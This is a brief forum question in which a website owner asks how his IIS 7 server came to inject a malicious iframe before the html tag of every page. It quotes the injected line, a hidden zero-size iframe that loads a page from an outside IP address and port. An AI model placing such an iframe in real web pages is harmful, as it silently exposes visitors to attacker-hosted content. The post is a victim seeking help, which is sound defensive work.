What is the technique used to make my IIS 7 serve all pages with an injected iframe
- by Andre Carlucci
Since my previous question was closed without an answer, I'm changing it a bit and asking again.
All my pages are being served with an malicious iframe injected just before the html tag.
The code looks like this:
<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe> …